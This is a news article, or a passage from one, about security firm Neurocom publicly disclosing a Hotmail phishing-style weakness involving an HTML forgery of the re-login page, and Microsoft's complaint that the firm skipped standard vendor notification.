The exploit was described on the Bugtraq security mailing list Jan. 26 and was repaired within days, according to Microsoft's security response team. Microsoft on Friday said that security firm Neurocom had violated standard bug-reporting protocols by going public with the alleged vulnerability on Wednesday before contacting the company's security team.
"Our purpose was not to punish Microsoft at all," said Cyril Simonnet, an executive at Neurocom's Canada division. "Our purpose is just to find security breaches."
Neurocom issued the warning over a security hole involving a malicious program known as a Trojan horse, which passes itself off as another application. In this case, potential hackers could use the Trojan horse, written in HTML (Hypertext Markup Language), to create a "perfect replica" of Hotmail's re-login page, according to Neurocom.
The company said that other sites providing Web-based e-mail may also be vulnerable to a similar attack.
"It's a new instance of an old problem," said Elias Levy, chief technology officer for SecurityFocus.com. "It's another way to get past those filters, and it's probably not going to be the last."
Scott Culp, a program manager with Microsoft's Security Response Center, said he is not sure why Neurocom did not contact Microsoft before issuing its statement this week.
"Most people in the security industry follow a code of conduct in which they give the vendor notice of anything that they believe affects that vendor's product," he said.
However, Neurocom said in a statement that "the breaches in question come from omissions in the conception of these filters" and that the procedure to hack into an e-mail system "is relatively simple and requires very little technical knowledge."